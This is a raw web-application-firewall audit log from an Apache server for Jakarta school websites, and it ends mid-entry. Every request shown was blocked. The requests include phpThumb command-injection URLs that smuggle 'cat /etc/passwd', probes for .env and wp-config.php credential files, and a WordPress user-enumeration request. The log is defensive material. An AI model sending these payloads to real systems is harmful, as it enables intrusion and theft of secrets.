--3b669f36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b669f36-E-- --3b669f36-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424955194439 1789 (- - -) Stopwatch2: 1745424955194439 1789; combined=541, p1=387, p2=133, p3=0, p4=0, p5=21, sr=100, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b669f36-Z-- --91faaf77-A-- [23/Apr/2025:23:15:55 +0700] aAkSO9Iw_rqnm4P5_afPcQAAAE0 103.236.140.4 42494 103.236.140.4 8181 --91faaf77-B-- GET /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --91faaf77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91faaf77-E-- --91faaf77-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424955390332 12326 (- - -) Stopwatch2: 1745424955390332 12326; combined=21763, p1=363, p2=136, p3=0, p4=0, p5=10647, sr=65, sw=0, l=0, gc=10617 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91faaf77-Z-- --2db1386a-A-- [23/Apr/2025:23:15:55 +0700] aAkSOxuwXEWV6ydgl52ZuwAAAAg 103.236.140.4 42504 103.236.140.4 8181 --2db1386a-B-- GET /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2db1386a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2db1386a-E-- --2db1386a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424955619556 2147 (- - -) Stopwatch2: 1745424955619556 2147; combined=621, p1=446, p2=146, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2db1386a-Z-- --80b5541f-A-- [23/Apr/2025:23:15:55 +0700] aAkSOxuwXEWV6ydgl52ZvQAAABg 103.236.140.4 42510 103.236.140.4 8181 --80b5541f-B-- GET /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --80b5541f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80b5541f-E-- --80b5541f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424955831684 2302 (- - -) Stopwatch2: 1745424955831684 2302; combined=615, p1=420, p2=157, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80b5541f-Z-- --746c8452-A-- [23/Apr/2025:23:15:56 +0700] aAkSPD1ahuoJLEjKiAU18QAAAJI 103.236.140.4 42512 103.236.140.4 8181 --746c8452-B-- GET /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --746c8452-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --746c8452-E-- --746c8452-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424956030475 1707 (- - -) Stopwatch2: 1745424956030475 1707; combined=514, p1=352, p2=129, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --746c8452-Z-- --8ce3c57d-A-- [23/Apr/2025:23:15:56 +0700] aAkSPD1ahuoJLEjKiAU18gAAAI8 103.236.140.4 42514 103.236.140.4 8181 --8ce3c57d-B-- GET /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --8ce3c57d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ce3c57d-E-- --8ce3c57d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424956224987 1397 (- - -) Stopwatch2: 1745424956224987 1397; combined=490, p1=347, p2=117, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ce3c57d-Z-- --723ed32e-A-- [23/Apr/2025:23:15:56 +0700] aAkSPBuwXEWV6ydgl52ZvgAAAAU 103.236.140.4 42516 103.236.140.4 8181 --723ed32e-B-- GET /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --723ed32e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --723ed32e-E-- --723ed32e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424956445907 1847 (- - -) Stopwatch2: 1745424956445907 1847; combined=623, p1=437, p2=154, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --723ed32e-Z-- --94a9662e-A-- [24/Apr/2025:00:43:55 +0700] aAkm2z1ahuoJLEjKiAVpigAAAIg 103.236.140.4 33752 103.236.140.4 8181 --94a9662e-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 45.148.10.172 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 45.148.10.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ANE-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --94a9662e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94a9662e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745430235147236 818 (- - -) Stopwatch2: 1745430235147236 818; combined=254, p1=225, p2=0, p3=0, p4=0, p5=29, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94a9662e-Z-- --623b9659-A-- [24/Apr/2025:01:17:48 +0700] aAkuzD1ahuoJLEjKiAV82gAAAJM 103.236.140.4 41936 103.236.140.4 8181 --623b9659-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --623b9659-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --623b9659-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745432268638633 884 (- - -) Stopwatch2: 1745432268638633 884; combined=399, p1=343, p2=0, p3=0, p4=0, p5=56, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --623b9659-Z-- --8777f25c-A-- [24/Apr/2025:01:17:48 +0700] aAkuzDI97BrbgvDq16S-uwAAAMg 103.236.140.4 41942 103.236.140.4 8181 --8777f25c-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8777f25c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8777f25c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745432268892084 785 (- - -) Stopwatch2: 1745432268892084 785; combined=338, p1=297, p2=0, p3=0, p4=0, p5=40, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8777f25c-Z-- --1696465c-A-- [24/Apr/2025:01:17:51 +0700] aAkuz9Iw_rqnm4P5_aciBQAAAFU 103.236.140.4 41956 103.236.140.4 8181 --1696465c-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --1696465c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1696465c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745432271885764 3732 (- - -) Stopwatch2: 1745432271885764 3732; combined=503, p1=347, p2=0, p3=0, p4=0, p5=156, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1696465c-Z-- --f82da129-A-- [24/Apr/2025:01:17:52 +0700] aAku0NIw_rqnm4P5_aciBgAAAEM 103.236.140.4 41958 103.236.140.4 8181 --f82da129-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f82da129-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f82da129-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745432272057016 773 (- - -) Stopwatch2: 1745432272057016 773; combined=350, p1=318, p2=0, p3=0, p4=0, p5=32, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f82da129-Z-- --2b122d6e-A-- [24/Apr/2025:01:17:52 +0700] aAku0BuwXEWV6ydgl539xgAAAAI 103.236.140.4 41960 103.236.140.4 8181 --2b122d6e-B-- GET /settings/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2b122d6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b122d6e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745432272239405 743 (- - -) Stopwatch2: 1745432272239405 743; combined=330, p1=295, p2=0, p3=0, p4=0, p5=35, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b122d6e-Z-- --b0425e56-A-- [24/Apr/2025:03:25:23 +0700] aAlMsz1ahuoJLEjKiAWDaQAAAIU 103.236.140.4 43128 103.236.140.4 8181 --b0425e56-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.131.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.131.145 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b0425e56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0425e56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745439923677118 772 (- - -) Stopwatch2: 1745439923677118 772; combined=354, p1=316, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0425e56-Z-- --9ccd8002-A-- [24/Apr/2025:03:51:54 +0700] aAlS6t5yz20UX9VrdZP3XgAAAEo 103.236.140.4 49352 103.236.140.4 8181 --9ccd8002-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 --9ccd8002-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ccd8002-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745441514617053 945 (- - -) Stopwatch2: 1745441514617053 945; combined=403, p1=362, p2=0, p3=0, p4=0, p5=41, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ccd8002-Z-- --5ec73f52-A-- [24/Apr/2025:04:59:35 +0700] aAlix8lQo524fhbIj1ylPwAAAAk 103.236.140.4 34842 103.236.140.4 8181 --5ec73f52-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.217.152 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 164.92.217.152 Accept-Encoding: gzip X-Varnish: 135976087 --5ec73f52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5ec73f52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745445575330353 892 (- - -) Stopwatch2: 1745445575330353 892; combined=346, p1=309, p2=0, p3=0, p4=0, p5=37, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ec73f52-Z-- --33c39f11-A-- [24/Apr/2025:05:25:47 +0700] aAlo695yz20UX9VrdZMEoAAAAEI 103.236.140.4 41650 103.236.140.4 8181 --33c39f11-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id 